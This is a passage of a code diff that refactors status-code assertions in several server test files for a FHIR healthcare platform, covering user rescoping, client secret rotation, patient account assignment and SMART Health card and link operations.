           { name: 'project', valueReference: createReference(project) },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as User;
     expect(updated.project?.reference).toStrictEqual(`Project/${project.id}`);
     expect(updated.meta?.project).toStrictEqual(project.id);
@@ -93,7 +93,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'server' }],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as User;
     expect(updated.project).toBeUndefined();
     expect(updated.meta?.project).toBeUndefined();
@@ -111,7 +111,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'server' }],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as User;
     expect(updated.project).toBeUndefined();
 
@@ -137,7 +137,7 @@ describe('User/$rescope', () => {
           { name: 'project', valueReference: createReference(project) },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Project admin cannot rescope User from a different project', async () => {
@@ -153,7 +153,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'server' }],
       } satisfies Parameters);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
 
     // Verify untouched
     const systemRepo = getGlobalSystemRepo();
@@ -183,7 +183,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'server' }],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Project admin attempting project rescope on User in their project returns 403', async () => {
@@ -203,7 +203,7 @@ describe('User/$rescope', () => {
           { name: 'project', valueReference: createReference(project) },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   describe('Non-admin', () => {
@@ -247,7 +247,7 @@ describe('User/$rescope', () => {
           resourceType: 'Parameters',
           parameter: [{ name: 'scope', valueCode: 'server' }],
         } satisfies Parameters);
-      expect(res.status).toBe(403);
+      expect(res).toHaveStatus(403);
     });
 
     test('cannot rescope to project', async () => {
@@ -263,7 +263,7 @@ describe('User/$rescope', () => {
             { name: 'project', valueReference: createReference(project) },
           ],
         } satisfies Parameters);
-      expect(res.status).toBe(403);
+      expect(res).toHaveStatus(403);
     });
   });
 
@@ -280,7 +280,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'project' }],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Invalid scope value returns 400', async () => {
@@ -296,7 +296,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'elsewhere' }],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Already server-scoped returns 400 when rescoping to server', async () => {
@@ -312,7 +312,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'server' }],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Already in target project returns 400 when rescoping to same project', async () => {
@@ -331,7 +331,7 @@ describe('User/$rescope', () => {
           { name: 'project', valueReference: createReference(project) },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Super admin can move User between projects', async () => {
@@ -361,7 +361,7 @@ describe('User/$rescope', () => {
           { name: 'project', valueReference: createReference(otherProject) },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as User;
     expect(updated.project?.reference).toStrictEqual(`Project/${otherProject.id}`);
     expect(updated.meta?.project).toStrictEqual(otherProject.id);
@@ -392,7 +392,7 @@ describe('User/$rescope', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'scope', valueCode: 'server' }],
       } satisfies Parameters);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
 
     const systemRepo = getGlobalSystemRepo();
     const reread = await systemRepo.readResource<User>('User', user.id);
@@ -420,7 +420,7 @@ describe('User/$rescope', () => {
           { name: 'project', valueReference: { reference } },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Target project does not exist returns 404', async () => {
@@ -439,7 +439,7 @@ describe('User/$rescope', () => {
           { name: 'project', valueReference: { reference: `Project/${randomUUID()}` } },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Cannot rescope to project when User has membership in another project', async () => {
@@ -460,7 +460,7 @@ describe('User/$rescope', () => {
           { name: 'project', valueReference: createReference(project) },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(JSON.stringify(res.body)).toMatch(/another project/);
   });
 });

--- a/packages/server/src/fhir/operations/resourcegraph.test.ts
+++ b/packages/server/src/fhir/operations/resourcegraph.test.ts
@@ -557,6 +557,6 @@ async function createResource<T extends Resource>(resource: T, token?: string): 
     .set('Authorization', 'Bearer ' + currentToken)
     .set('Content-Type', ContentType.FHIR_JSON)
     .send(resource);
-  expect(res.status).toBe(201);
+  expect(res).toHaveStatus(201);
   return res.body;
 }

--- a/packages/server/src/fhir/operations/rotatesecret.test.ts
+++ b/packages/server/src/fhir/operations/rotatesecret.test.ts
@@ -33,7 +33,7 @@ describe('ClientApplication $rotate-secret', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({ ...client, secret: 'foo' } satisfies ClientApplication);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as ClientApplication;
     expect(updated.secret).toEqual('foo');
   });
@@ -54,7 +54,7 @@ describe('ClientApplication $rotate-secret', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'secret', valueString: client.secret }],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as ClientApplication;
     expect(updated.secret).toBeDefined();
     expect(updated.secret).not.toStrictEqual(client.secret);
@@ -77,7 +77,7 @@ describe('ClientApplication $rotate-secret', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'secret', valueString: 'incorrect' }],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue?.[0]?.code).toStrictEqual('invalid');
   });
 
@@ -97,7 +97,7 @@ describe('ClientApplication $rotate-secret', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'secret', valueString: client.secret }],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as ClientApplication;
     expect(updated.secret).toBeDefined();
     expect(updated.secret).not.toStrictEqual(client.secret);
@@ -112,7 +112,7 @@ describe('ClientApplication $rotate-secret', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'retiringSecret', valueString: updated.retiringSecret }],
       } satisfies Parameters);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const retired = res2.body as ClientApplication;
     expect(retired.secret).toStrictEqual(updated.secret);
     expect(retired.retiringSecret).toBeUndefined();
@@ -133,7 +133,7 @@ describe('ClientApplication $rotate-secret', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'secret', valueString: client.secret }],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
     expect(res.body.issue?.[0]?.code).toStrictEqual('forbidden');
   });
 
@@ -153,7 +153,7 @@ describe('ClientApplication $rotate-secret', () => {
         resourceType: 'Parameters',
         parameter: [],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue?.[0]?.code).toStrictEqual('invalid');
   });
 
@@ -176,7 +176,7 @@ describe('ClientApplication $rotate-secret', () => {
           { name: 'retiringSecret', valueString: client.secret },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue?.[0]?.code).toStrictEqual('invalid');
   });
 });

--- a/packages/server/src/fhir/operations/set-accounts.test.ts
+++ b/packages/server/src/fhir/operations/set-accounts.test.ts
@@ -52,14 +52,14 @@ describe('Patient Set Accounts Operation', () => {
       .post('/fhir/R4/Organization')
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Organization' });
-    expect(orgRes.status).toBe(201);
+    expect(orgRes).toHaveStatus(201);
     organization1 = orgRes.body as Organization;
 
     const orgRes2 = await request(app)
       .post('/fhir/R4/Organization')
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Organization' });
-    expect(orgRes2.status).toBe(201);
+    expect(orgRes2).toHaveStatus(201);
     organization2 = orgRes2.body as Organization;
 
     // Create patient
@@ -70,7 +70,7 @@ describe('Patient Set Accounts Operation', () => {
         resourceType: 'Patient',
         name: [{ given: ['Alice'], family: 'Smith' }],
       } satisfies Patient);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     patient = res1.body as Patient;
 
     // Create observation
@@ -90,7 +90,7 @@ describe('Patient Set Accounts Operation', () => {
         },
         subject: createReference(patient),
       } satisfies Observation);
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     observation = res2.body as Observation;
 
     //Create a diagnostic report
@@ -110,7 +110,7 @@ describe('Patient Set Accounts Operation', () => {
           ],
         },
       } satisfies DiagnosticReport);
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
     diagnosticReport = res3.body as DiagnosticReport;
   });
 
@@ -140,7 +140,7 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     const result = res3.body;
     expect(result.parameter?.[0].name).toBe('resourcesUpdated');
     expect(result.parameter?.[0].valueInteger).toBe(3); // Observation and DiagnosticReport
@@ -150,7 +150,7 @@ describe('Patient Set Accounts Operation', () => {
       .get(`/fhir/R4/Patient/${patient.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     const updatedPatient = res4.body as Patient;
     expect(updatedPatient.meta?.accounts).toBeDefined();
     expect(updatedPatient.meta?.accounts?.[0].reference).toBe(`Organization/${organization1.id}`);
@@ -161,7 +161,7 @@ describe('Patient Set Accounts Operation', () => {
       .get(`/fhir/R4/Observation/${observation.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     const updatedObservation = res5.body as Observation;
     expect(updatedObservation.meta?.accounts).toBeDefined();
     expect(updatedObservation.meta?.accounts?.[0].reference).toBe(`Organization/${organization1.id}`);
@@ -172,7 +172,7 @@ describe('Patient Set Accounts Operation', () => {
       .get(`/fhir/R4/DiagnosticReport/${diagnosticReport.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     const updatedDiagnosticReport = res6.body as DiagnosticReport;
     expect(updatedDiagnosticReport.meta?.accounts).toBeDefined();
     expect(updatedDiagnosticReport.meta?.accounts?.[0].reference).toBe(`Organization/${organization1.id}`);
@@ -200,13 +200,13 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
     const numberResourcesUpdated = res7.body.parameter?.[0].valueInteger;
 
     const res = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$everything`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const everything = res.body as Bundle;
     const allResources = everything.entry?.length ?? 0;
     const resourcesNotInCompartment = everything.entry?.filter((entry) => entry?.search?.mode !== 'match').length ?? 0;
@@ -228,7 +228,7 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('setAccountsHandler() called without an id', async () => {
@@ -262,7 +262,7 @@ describe('Patient Set Accounts Operation', () => {
         },
       } satisfies Communication);
 
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const communication = res1.body as Communication;
     expect(communication.meta?.security).toBeDefined();
 
@@ -283,13 +283,13 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res4 = await request(app)
       .get(`/fhir/R4/Communication/${communication.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     const updatedCommunication = res4.body as Communication;
     expect(updatedCommunication.meta?.accounts).toHaveLength(1);
     expect(updatedCommunication.meta?.security).toBeDefined();
@@ -308,7 +308,7 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     const result = res1.body;
     expect(result.parameter?.[0].name).toBe('resourcesUpdated');
     expect(result.parameter?.[0].valueInteger).toBe(1); // Observation only
@@ -318,7 +318,7 @@ describe('Patient Set Accounts Operation', () => {
       .get(`/fhir/R4/Observation/${observation.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const updatedObservation = res2.body as Observation;
     expect(updatedObservation.meta?.accounts).toBeDefined();
     expect(updatedObservation.meta?.accounts?.[0].reference).toBe(`Organization/${organization2.id}`);
@@ -340,7 +340,7 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     const result2 = res3.body;
     expect(result2.parameter?.[0].name).toBe('resourcesUpdated');
     expect(result2.parameter?.[0].valueInteger).toBe(3); // Observation and DiagnosticReport included
@@ -350,7 +350,7 @@ describe('Patient Set Accounts Operation', () => {
       .get(`/fhir/R4/Patient/${patient.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     const updatedPatient = res4.body as Patient;
     expect(updatedPatient.meta?.accounts).toBeDefined();
     expect(updatedPatient.meta?.accounts?.[0].reference).toBe(`Organization/${organization1.id}`);
@@ -360,7 +360,7 @@ describe('Patient Set Accounts Operation', () => {
       .get(`/fhir/R4/Observation/${observation.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     const finalObservation = res5.body as Observation;
     expect(finalObservation.meta?.accounts).toStrictEqual([
       { reference: getReferenceString(organization2) },
@@ -372,7 +372,7 @@ describe('Patient Set Accounts Operation', () => {
       .get(`/fhir/R4/DiagnosticReport/${diagnosticReport.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     const updatedDiagnosticReport = res6.body as DiagnosticReport;
     expect(updatedDiagnosticReport.meta?.accounts).toBeDefined();
     expect(updatedDiagnosticReport.meta?.accounts?.[0].reference).toBe(`Organization/${organization1.id}`);
@@ -392,7 +392,7 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Supports async response', async () => {
@@ -418,7 +418,7 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(initRes.status).toBe(202);
+    expect(initRes).toHaveStatus(202);
     expect(initRes.headers['content-location']).toBeDefined();
 
     // Manually push through BullMQ job
@@ -445,7 +445,7 @@ describe('Patient Set Accounts Operation', () => {
     const statusRes = await request(app)
       .get(contentLocation.pathname)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(statusRes.status).toBe(200);
+    expect(statusRes).toHaveStatus(200);
     const resBody = statusRes.body as AsyncJob;
     expect(resBody.output?.parameter).toStrictEqual(
       expect.arrayContaining([{ name: 'resourcesUpdated', valueInteger: 3 }])
@@ -475,7 +475,7 @@ describe('Patient Set Accounts Operation', () => {
           },
         ],
       });
-    expect(initRes.status).toBe(202);
+    expect(initRes).toHaveStatus(202);
     expect(initRes.headers['content-location']).toBeDefined();
     const jobUrlMatch = /job\/([^/]+)\/status/.exec(initRes.headers['content-location']);
     const asyncJobId = jobUrlMatch?.[1];
@@ -486,7 +486,7 @@ describe('Patient Set Accounts Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send([{ op: 'replace', path: '/status', value: 'cancelled' }]);
-    expect(cancelRes.status).toBe(200);
+    expect(cancelRes).toHaveStatus(200);
 
     // Manually push through BullMQ job
     expect(queue.add).toHaveBeenCalledWith(
@@ -512,7 +512,7 @@ describe('Patient Set Accounts Operation', () => {
     const statusRes = await request(app)
       .get(contentLocation.pathname)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(statusRes.status).toBe(200);
+    expect(statusRes).toHaveStatus(200);
     const resBody = statusRes.body as AsyncJob;
     expect(resBody.status).toStrictEqual('cancelled');
     expect(resBody.output?.parameter).toBeUndefined();
@@ -530,13 +530,13 @@ describe('Patient Set Accounts Operation', () => {
           { name: 'propagate', valueBoolean: false },
         ],
       });
-    expect(setTwo.status).toBe(200);
+    expect(setTwo).toHaveStatus(200);
 
     const get1 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(get1.status).toBe(200);
+    expect(get1).toHaveStatus(200);
     expect(get1.body.meta?.accounts?.map((r: any) => r.reference)).toEqual(
       expect.arrayContaining([`Organization/${organization1.id}`, `Organization/${organization2.id}`])
     );
@@ -551,14 +551,14 @@ describe('Patient Set Accounts Operation', () => {
           { name: 'propagate', valueBoolean: false },
         ],
       });
-    expect(setOne.status).toBe(200);
+    expect(setOne).toHaveStatus(200);
     expect(setOne.body.parameter?.[0]).toMatchObject({ name: 'resourcesUpdated', valueInteger: 1 });
 
     const get2 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}`)
       .set('X-Medplum', 'extended')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(get2.status).toBe(200);
+    expect(get2).toHaveStatus(200);
     const acctRefs = (get2.body.meta?.accounts ?? []).map((r: any) => r.reference);
     expect(acctRefs).toEqual([`Organization/${organization2.id}`]);
   });
@@ -587,7 +587,7 @@ describe('Patient Set Accounts Operation', () => {
         resourceType: 'Patient',
         meta: { accounts: [orgRef] },
       } satisfies Patient);
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as Patient;
     const patientRef = createReference(patient);
     expect(patient.meta?.accounts).toStrictEqual([orgRef]);
@@ -604,7 +604,7 @@ describe('Patient Set Accounts Operation', () => {
         code: { text: 'Lab report' },
         subject: patientRef,
       } satisfies DiagnosticReport);
-    expect(reportRes.status).toBe(201);
+    expect(reportRes).toHaveStatus(201);
     const diagnosticReport = reportRes.body as DiagnosticReport;
     expect(diagnosticReport.subject).toStrictEqual(patientRef);
     expect(diagnosticReport.meta?.compartment).toStrictEqual(expect.arrayContaining([orgRef, patientRef]));

--- a/packages/server/src/fhir/operations/smarthealth.test.ts
+++ b/packages/server/src/fhir/operations/smarthealth.test.ts
@@ -34,7 +34,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ _type: 'Patient', includeQrCode: true });
-    expect(generateResponse.status).toBe(200);
+    expect(generateResponse).toHaveStatus(200);
 
     const credential = getStringParameter(generateResponse.body, 'credential');
     expect(credential.split('.')).toHaveLength(3);
@@ -48,7 +48,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ credential });
-    expect(verifyResponse.status).toBe(200);
+    expect(verifyResponse).toHaveStatus(200);
     expect(getBooleanParameter(verifyResponse.body, 'valid')).toBe(true);
 
     const bundle = JSON.parse(getStringParameter(verifyResponse.body, 'fhirBundle')) as Bundle;
@@ -60,7 +60,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shcUri: getStringParameter(generateResponse.body, 'shcUri') });
-    expect(verifyShcUriResponse.status).toBe(200);
+    expect(verifyShcUriResponse).toHaveStatus(200);
     expect(getBooleanParameter(verifyShcUriResponse.body, 'valid')).toBe(true);
 
     const verifyFileResponse = await request(app)
@@ -68,7 +68,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ file: getStringParameter(generateResponse.body, 'file') });
-    expect(verifyFileResponse.status).toBe(200);
+    expect(verifyFileResponse).toHaveStatus(200);
     expect(getBooleanParameter(verifyFileResponse.body, 'valid')).toBe(true);
   });
 
@@ -79,14 +79,14 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ exp: Math.floor(Date.now() / 1000) - 60 });
-    expect(expiredResponse.status).toBe(200);
+    expect(expiredResponse).toHaveStatus(200);
 
     const expiredVerifyResponse = await request(app)
       .post('/fhir/R4/$verify-smart-health-card')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ credential: getStringParameter(expiredResponse.body, 'credential') });
-    expect(expiredVerifyResponse.status).toBe(200);
+    expect(expiredVerifyResponse).toHaveStatus(200);
     expect(getBooleanParameter(expiredVerifyResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(expiredVerifyResponse.body, 'error')).toContain('expired');
 
@@ -95,7 +95,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({});
-    expect(missingInputResponse.status).toBe(400);
+    expect(missingInputResponse).toHaveStatus(400);
     expect(missingInputResponse.body).toMatchObject(badRequest('Expected credential, shcUri, or file'));
 
     const invalidQrResponse = await request(app)
@@ -103,7 +103,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shcUri: 'shc:/123' });
-    expect(invalidQrResponse.status).toBe(400);
+    expect(invalidQrResponse).toHaveStatus(400);
     expect(invalidQrResponse.body).toMatchObject(badRequest('Invalid SMART Health Card numeric encoding'));
 
     const invalidFileResponse = await request(app)
@@ -111,7 +111,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ file: JSON.stringify({ verifiableCredential: [] }) });
-    expect(invalidFileResponse.status).toBe(400);
+    expect(invalidFileResponse).toHaveStatus(400);
     expect(invalidFileResponse.body).toMatchObject(badRequest('Expected credential, shcUri, or file'));
 
     const missingPatientResponse = await request(app)
@@ -119,7 +119,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({});
-    expect(missingPatientResponse.status).toBe(404);
+    expect(missingPatientResponse).toHaveStatus(404);
   });
 
   test('Verifies external SMART Health Card signatures without trusting issuer', async () => {
@@ -147,7 +147,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ credential });
-    expect(verifyResponse.status).toBe(200);
+    expect(verifyResponse).toHaveStatus(200);
     expect(getBooleanParameter(verifyResponse.body, 'valid')).toBe(true);
     expect(getBooleanParameter(verifyResponse.body, 'issuerTrusted')).toBe(false);
     expect(getBooleanParameter(verifyResponse.body, 'verified')).toBe(false);
@@ -170,7 +170,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ passcode: '123456', label: 'Test Link' });
-    expect(generateResponse.status).toBe(200);
+    expect(generateResponse).toHaveStatus(200);
 
     const shlink = getStringParameter(generateResponse.body, 'shlink');
     expect(shlink).toMatch(/^shlink:\//);
@@ -194,7 +194,7 @@ describe('SMART Health operations', () => {
       .post(manifestUrl.pathname)
       .set('Content-Type', ContentType.JSON)
       .send({ recipient: 'Test Recipient', passcode: '123456' });
-    expect(manifestResponse.status).toBe(200);
+    expect(manifestResponse).toHaveStatus(200);
     expect(manifestResponse.body.files).toHaveLength(1);
     expect(manifestResponse.body.files[0].embedded).toBeDefined();
 
@@ -203,7 +203,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink, recipient: 'Test Recipient', passcode: '123456' });
-    expect(resolveResponse.status).toBe(200);
+    expect(resolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(resolveResponse.body, 'valid')).toBe(true);
 
     const fhirResources = JSON.parse(getStringParameter(resolveResponse.body, 'fhirResources')) as Bundle[];
@@ -214,7 +214,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink: `https://viewer.example/#${shlink}`, recipient: 'Test Recipient', passcode: '123456' });
-    expect(viewerResolveResponse.status).toBe(200);
+    expect(viewerResolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(viewerResolveResponse.body, 'valid')).toBe(true);
   });
 
@@ -225,7 +225,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ _type: 'Patient', passcode: '123456', includeQrCode: true });
-    expect(passcodeResponse.status).toBe(200);
+    expect(passcodeResponse).toHaveStatus(200);
     expect(getStringParameter(passcodeResponse.body, 'qrCodeDataUrl')).toMatch(/^data:image\/png;base64,/);
 
     const manifestUrl = new URL(getStringParameter(passcodeResponse.body, 'manifestUrl'));
@@ -233,7 +233,7 @@ describe('SMART Health operations', () => {
       .post(manifestUrl.pathname)
       .set('Content-Type', ContentType.JSON)
       .send({ recipient: 'Test Recipient' });
-    expect(missingPasscodeManifestResponse.status).toBe(400);
+    expect(missingPasscodeManifestResponse).toHaveStatus(400);
     expect(missingPasscodeManifestResponse.body.error).toContain('passcode');
 
     const wrongPasscodeResolveResponse = await request(app)
@@ -245,7 +245,7 @@ describe('SMART Health operations', () => {
         recipient: 'Test Recipient',
         passcode: 'wrong',
       });
-    expect(wrongPasscodeResolveResponse.status).toBe(200);
+    expect(wrongPasscodeResolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(wrongPasscodeResolveResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(wrongPasscodeResolveResponse.body, 'error')).toContain('passcode');
 
@@ -253,21 +253,21 @@ describe('SMART Health operations', () => {
       .post('/shl/not-found/manifest')
       .set('Content-Type', ContentType.JSON)
       .send({});
-    expect(missingManifestResponse.status).toBe(404);
+    expect(missingManifestResponse).toHaveStatus(404);
 
     const expiredResponse = await request(app)
       .post(`/fhir/R4/Patient/${patient.id}/$generate-smart-health-link`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ exp: Math.floor(Date.now() / 1000) - 60 });
-    expect(expiredResponse.status).toBe(200);
+    expect(expiredResponse).toHaveStatus(200);
 
     const expiredResolveResponse = await request(app)
       .post('/fhir/R4/$resolve-smart-health-link')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink: getStringParameter(expiredResponse.body, 'shlink') });
-    expect(expiredResolveResponse.status).toBe(200);
+    expect(expiredResolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(expiredResolveResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(expiredResolveResponse.body, 'error')).toContain('expired');
 
@@ -276,7 +276,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink: 'https://example.com/no-link' });
-    expect(invalidUriResponse.status).toBe(200);
+    expect(invalidUriResponse).toHaveStatus(200);
     expect(getBooleanParameter(invalidUriResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(invalidUriResponse.body, 'error')).toContain('Invalid SMART Health Link URI');
 
@@ -285,7 +285,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink: 123 });
-    expect(nonStringShlinkResponse.status).toBe(200);
+    expect(nonStringShlinkResponse).toHaveStatus(200);
     expect(getBooleanParameter(nonStringShlinkResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(nonStringShlinkResponse.body, 'error')).toContain('Expected shlink to be a string');
 
@@ -294,7 +294,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink: 'shlink:/e30' });
-    expect(invalidPayloadResponse.status).toBe(200);
+    expect(invalidPayloadResponse).toHaveStatus(200);
     expect(getBooleanParameter(invalidPayloadResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(invalidPayloadResponse.body, 'error')).toContain('Invalid SMART Health Link payload');
 
